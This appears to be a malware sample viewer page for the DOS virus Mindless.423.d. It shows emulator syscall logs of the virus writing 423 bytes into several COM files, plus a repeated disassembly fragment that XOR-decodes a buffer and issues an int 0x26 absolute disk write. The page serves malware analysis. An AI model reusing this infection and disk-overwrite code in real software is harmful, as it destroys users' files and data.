Sample viewer

vx.netlux.org/Virus.DOS.Mindless.423.d

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:28.046959459Z 42 PC: 12a58 | Get date 0x12a58: cmp al, 0
0x12a5a: jne 0x12ab9
0x12a5c: mov ax, 0x3301
0x12a5f: xor dl, dl
0x12a61: int 0x21
0x12a63: mov cx, 0x44
0x12a66: mov si, 0x1fe
0x12a69: mov al, byte ptr [si]
0x12a6b: xor al, 1
0x12a6d: mov byte ptr [si], al
0x12a6f: inc si
0x12a70: loop 0x12a69
0x12a72: cmp byte ptr [0x1f5], 0x1b
0x12a77: ja 0x12a8f
0x12a79: pushf
0x12a7a: mov al, byte ptr [0x1f5]
0x12a7d: mov cx, word ptr [0x1f6]
0x12a81: xor dx, dx
0x12a83: mov bx, 0x1fe
0x12a86: int 0x26
2018-12-17T22:51:28.050417872Z 78 PC: 12af6 | Find first file
2018-12-17T22:51:28.056945274Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.062440055Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.079217312Z 61 PC: 12b0f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:28.085757466Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.087175135Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.093806743Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.104843566Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.112465029Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.115552229Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.123241158Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.13387407Z 61 PC: 12b0f | Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:28.140821663Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.143588805Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.150660969Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.152356316Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.161012772Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.163640819Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.169500697Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.18031582Z 61 PC: 12b0f | Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:28.192742366Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.194457639Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.201808327Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.203936084Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.211458196Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.214309644Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.220708543Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.231354982Z 61 PC: 12b0f | Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:28.238619904Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.240813968Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.248072012Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.249582375Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.25834765Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.260941346Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.267403792Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.279802646Z 61 PC: 12b0f | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:28.286692894Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.288416797Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.295352266Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.297239051Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.304394729Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.307214248Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.313765827Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.323445241Z 61 PC: 12b0f | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:28.331023758Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.33289088Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.339238084Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.340666371Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.348194129Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.350975929Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.356820513Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.367589398Z 61 PC: 12b0f | Open file (Filename = 'PAH.COM')
2018-12-17T22:51:28.37429219Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.375873518Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.385672184Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.387104595Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.394665124Z 79 PC: 12b31 | Find next file
2018-12-17T22:51:28.397836984Z 67 PC: 12afe | Get or set file attributes
2018-12-17T22:51:28.403276043Z 67 PC: 12b07 | Get or set file attributes
2018-12-17T22:51:28.413032831Z 61 PC: 12b0f | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:28.419983065Z 87 PC: 12b16 | Get or set file date and time
2018-12-17T22:51:28.421441986Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-17T22:51:28.428469102Z 87 PC: 12b29 | Get or set file date and time
2018-12-17T22:51:28.431055404Z 62 PC: 12b2d | Close file
2018-12-17T22:51:28.438325709Z 79 PC: 12b31 | Find next file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10555,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:19.089810829Z 42 PC: 12a58 | Get date 0x12a58: cmp al, 0
0x12a5a: jne 0x12ab9
0x12a5c: mov ax, 0x3301
0x12a5f: xor dl, dl
0x12a61: int 0x21
0x12a63: mov cx, 0x44
0x12a66: mov si, 0x1fe
0x12a69: mov al, byte ptr [si]
0x12a6b: xor al, 1
0x12a6d: mov byte ptr [si], al
0x12a6f: inc si
0x12a70: loop 0x12a69
0x12a72: cmp byte ptr [0x1f5], 0x1b
0x12a77: ja 0x12a8f
0x12a79: pushf
0x12a7a: mov al, byte ptr [0x1f5]
0x12a7d: mov cx, word ptr [0x1f6]
0x12a81: xor dx, dx
0x12a83: mov bx, 0x1fe
0x12a86: int 0x26
2018-12-25T12:28:19.093186373Z 78 PC: 12af6 | Find first file
2018-12-25T12:28:19.101609047Z 67 PC: 12afe | Get or set file attributes
2018-12-25T12:28:19.108318568Z 67 PC: 12b07 | Get or set file attributes
2018-12-25T12:28:19.125832703Z 61 PC: 12b0f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:28:19.135649056Z 87 PC: 12b16 | Get or set file date and time
2018-12-25T12:28:19.137567419Z 64 PC: 12b22 | Write file or device (Write 423 bytes on handle 5)
2018-12-25T12:28:19.145873263Z 87 PC: 12b29 | Get or set file date and time
2018-12-25T12:28:19.148161393Z 62 PC: 12b2d | Close file
2018-12-25T12:28:19.157273814Z 79 PC: 12b31 | Find next file
2018-12-25T12:28:19.161034924Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.168436841Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.176710329Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.184535613Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.18598538Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.193907542Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.195437182Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.203485681Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.207228392Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.213480058Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.224565176Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.238698813Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.240095508Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.247536953Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.249488362Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.258415915Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.261398823Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.272960902Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.284998444Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.292911383Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.294901559Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.314803072Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.316728963Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.325990289Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.330355948Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.336932283Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.349107303Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.357153982Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.361725786Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.369254413Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.371403262Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.379112819Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.381286709Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.386572704Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.393241725Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.400810039Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.402937769Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.410961216Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.413887Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.422455892Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.426931027Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.433703609Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.445002685Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.453630802Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.455539188Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.46338438Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.466049845Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.474979086Z 79 PC: 12b31 | Find next file (See above)
2018-12-25T12:28:19.479143289Z 67 PC: 12afe | Get or set file attributes (See above)
2018-12-25T12:28:19.486576381Z 67 PC: 12b07 | Get or set file attributes (See above)
2018-12-25T12:28:19.49797768Z 61 PC: 12b0f | Open file (See above)
2018-12-25T12:28:19.505769074Z 87 PC: 12b16 | Get or set file date and time (See above)
2018-12-25T12:28:19.507720168Z 64 PC: 12b22 | Write file or device (See above)
2018-12-25T12:28:19.515787572Z 87 PC: 12b29 | Get or set file date and time (See above)
2018-12-25T12:28:19.517537001Z 62 PC: 12b2d | Close file (See above)
2018-12-25T12:28:19.525907756Z 79 PC: 12b31 | Find next file (See above)

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10555,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:19.423795555Z 42 PC: 12a58 | Get date 0x12a58: cmp al, 0
0x12a5a: jne 0x12ab9
0x12a5c: mov ax, 0x3301
0x12a5f: xor dl, dl
0x12a61: int 0x21
0x12a63: mov cx, 0x44
0x12a66: mov si, 0x1fe
0x12a69: mov al, byte ptr [si]
0x12a6b: xor al, 1
0x12a6d: mov byte ptr [si], al
0x12a6f: inc si
0x12a70: loop 0x12a69
0x12a72: cmp byte ptr [0x1f5], 0x1b
0x12a77: ja 0x12a8f
0x12a79: pushf
0x12a7a: mov al, byte ptr [0x1f5]
0x12a7d: mov cx, word ptr [0x1f6]
0x12a81: xor dx, dx
0x12a83: mov bx, 0x1fe
0x12a86: int 0x26
2018-12-25T12:28:19.427768281Z 51 PC: 12a63 | Get or set Ctrl-Break